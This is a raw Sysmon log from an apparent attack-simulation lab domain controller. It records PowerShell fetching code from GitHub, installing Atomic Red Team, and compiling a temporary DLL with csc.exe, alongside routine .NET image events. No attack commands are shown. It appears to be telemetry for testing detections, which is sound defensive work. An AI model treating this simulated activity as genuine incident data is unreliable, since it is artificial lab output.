0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023634Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.905{4DB9351A-A284-60D3-D205-00000000CF01}5344NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\8ZMQJ8Q7GU\System.IdentityModel.ni.dll.auxMD5=9D0F00700D609652DB902734694613B8,SHA256=D5308FC45EA8A28CBFF14C74E91DC0026F997C5B3E9B17A323DBEA25977C5C9A,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000023633Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.905{4DB9351A-A284-60D3-D205-00000000CF01}5344NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\8ZMQJ8Q7GU\System.IdentityModel.ni.dllMD5=E171AA6EB5C47D45E21E912A9E26EA98,SHA256=90F0557CF1BBCAE2D6B4ABFD7DE702F9AC5A3935491769174D190C6CBDE8EFD1,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000023632Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.889{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=86B297E17168F63CD906B2937D737E01,SHA256=76C2F662B1A49CA119E2E7456A5B3D15D577A44D3629B6038735E5DA866EFA99,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023631Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.889{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=90F1A01ED8BA67163ABD052F2DAD5345,SHA256=EEE39BB25DA99D952F63E6E0BD1EAAE0333A33A97BD60DE7E5F4900DAD9FE4A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023630Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.889{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EC42DA873F19A35FC903144869F8192F,SHA256=29D4FB9FAA753A2D496B181F99E488E099FBDCC23EB1B2A556CB143F5465A21E,IMPHASH=00000000000000000000000000000000falsetrue 22542200x800000000000000023629Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:15.256{4DB9351A-A273-60D3-3C05-00000000CF01}6608codeload.github.com0::ffff:192.30.255.120;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 22542200x800000000000000023628Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:15.103{4DB9351A-A273-60D3-3C05-00000000CF01}6608github.com0::ffff:192.30.255.112;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 22542200x800000000000000023627Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:14.728{4DB9351A-A273-60D3-3C05-00000000CF01}6608raw.githubusercontent.com0::ffff:185.199.109.133;::ffff:185.199.110.133;::ffff:185.199.111.133;::ffff:185.199.108.133;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x800000000000000023626Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:16.670{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A284-60D3-D205-00000000CF01}5344C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023625Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.655{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A284-60D3-D205-00000000CF01}5344C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023624Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:16.655{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A284-60D3-D205-00000000CF01}5344C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023623Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.655{4DB9351A-A284-60D3-D105-00000000CF01}5760NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\YQAEZ766ZH\System.EnterpriseServices.Wrapper.dllMD5=715FF11BA35606E6E6D22AC9EA360824,SHA256=DD1656A330AF91227E6A2FD9AE4C2E8829CC1212C41FEA65AB87CAABA05F8DE0,IMPHASH=00000000000000000000000000000000truetrue 
23542300x800000000000000023622Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.655{4DB9351A-A284-60D3-D105-00000000CF01}5760NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\YQAEZ766ZH\System.EnterpriseServices.ni.dll.auxMD5=0A3D733CF2912E64250EDA39EEA5531A,SHA256=65D8DC51F11912EAAC4ABC33D20B3B85A8721C8B727880FE923CD5D2DE06486D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023621Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.655{4DB9351A-A284-60D3-D105-00000000CF01}5760NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\YQAEZ766ZH\System.EnterpriseServices.ni.dllMD5=F1FAE792833A0090B3C155ED4C26FAF7,SHA256=06B53500FAF788E149178EF100B99C3F89A6E9111EF5A7FA4BEEF99FAA0E2F19,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000023620Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.623{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\master.zipMD5=A835063F1AA49BF95D9B393BC78EB8CA,SHA256=247D8D6B21A6EBA5843B8E5433118D0EE8C94A28EB92EEF996F33A7E357EDA38,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000023619Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.608{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\AtomicRedTeam\tmp\invoke-atomicredteam-master\install-atomicsfolder.ps12021-06-23 21:07:16.608 10341000x800000000000000023618Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
23542300x800000000000000023686Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:17.123{4DB9351A-A285-60D3-D905-00000000CF01}6384NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\J08HG89IBX\System.IO.Log.ni.dllMD5=DE0B0F09F4B529EFE36F27AB94390190,SHA256=38610F328B43D386E73BD1FFF30DA92A25B02D0816EB4B1A3BBBE0D81318F934,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023685Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:17.108{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A285-60D3-D905-00000000CF01}6384C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000023684Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:17.108{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\k4y1undg\k4y1undg.cmdlineMD5=41EB38BB5EE1ABE75910874C4F4FA696,SHA256=417D873754B5D33FB083E090894FB518664FBD3C7CD1D314630CFD7AC68D3841,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023683Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:17.108{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\k4y1undg\k4y1undg.0.csMD5=A29444398AC9A819C5D208948B81A14C,SHA256=F447865E0C75B6C39BECAB9B9527FCC583DEF24C18A66CC815A9419F375DDC11,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023682Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:17.092{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\k4y1undg\k4y1undg.dllMD5=CD8B2B57BE99272F96086E7E94667335,SHA256=85CC942A216A9DAC316679338C72BDD4CE2404D662B3ADC50964EEF35EB20683,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000023681Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:17.092{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\k4y1undg\k4y1undg.outMD5=58AE0BBFF884B6220A49DB74517619A9,SHA256=5022643F7533EEEF0177CAED5C483FB29742983A8683FB98B63A93157A7912FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023680Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:17.092{4DB9351A-A284-60D3-D405-00000000CF01}6900ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\k4y1undg\CSCCD4895C0D4A94362BF65B1CDDBE456E3.TMPMD5=4C368B1F62BCAB7C276943BB71D7B522,SHA256=F67DE663269E6BEAB900B2FD7F97C19FFFAD599211195BC32B0CAA8731CFC06D,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000023679Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 
21:07:17.092{4DB9351A-A284-60D3-D405-00000000CF01}6900C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\k4y1undg\k4y1undg.dll2021-06-23 21:07:16.920 23542300x800000000000000023678Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:17.092{4DB9351A-A284-60D3-D405-00000000CF01}6900ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\k4y1undg\k4y1undg.dllMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023677Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:17.092{4DB9351A-A284-60D3-D405-00000000CF01}6900ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\ADMINI~1\AppData\Local\Temp\RES4723.tmpMD5=A7189997D0A68EF5882E74791FA45482,SHA256=D696DC6EEABEB28323CB106F0843E1B8F47D2D91CDBAC2F03092B96CC379B0AB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000023676Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:17.092{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A285-60D3-D905-00000000CF01}6384C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023675Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:17.092{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A285-60D3-D905-00000000CF01}6384C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023674Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:17.076{4DB9351A-A285-60D3-D805-00000000CF01}6232ATTACKRANGE\AdministratorC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Users\ADMINI~1\AppData\Local\Temp\RES4723.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000023673Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:17.076{4DB9351A-A285-60D3-D705-00000000CF01}6244NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\GMM8YZHY6Z\System.IO.Compression.FileSystem.ni.dll.auxMD5=CFE0B80EA02CDC33A7834593D270A12E,SHA256=D9BC5BD28106A8E54A036EA947C7FA24D319A3012F751176D35A9406E728B630,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023672Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:17.076{4DB9351A-A285-60D3-D705-00000000CF01}6244NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\GMM8YZHY6Z\System.IO.Compression.FileSystem.ni.dllMD5=A62C8A9ADFBB0A623E09F15F91038F24,SHA256=8922BEAEA7E9B3943AD9C6351FBD52887F5459187B0D872D57C0BFF34825FB5D,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023671Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:17.076{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A285-60D3-D805-00000000CF01}6232C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023670Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:17.076{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023669Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:17.076{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023668Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:17.076{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023667Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:17.076{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023666Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:17.076{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084872C:\Windows\system32\csrss.exe{4DB9351A-A285-60D3-D805-00000000CF01}6232C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023665Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:17.076{4DB9351A-A284-60D3-D405-00000000CF01}6900584C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{4DB9351A-A285-60D3-D805-00000000CF01}6232C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b46d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3db4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3f2c|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+4002|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27b2|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+2804|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+2948|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7fe06|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+4726f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45e1f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45b16|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45826|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1938a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18bf6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+a831|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1f0a49|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
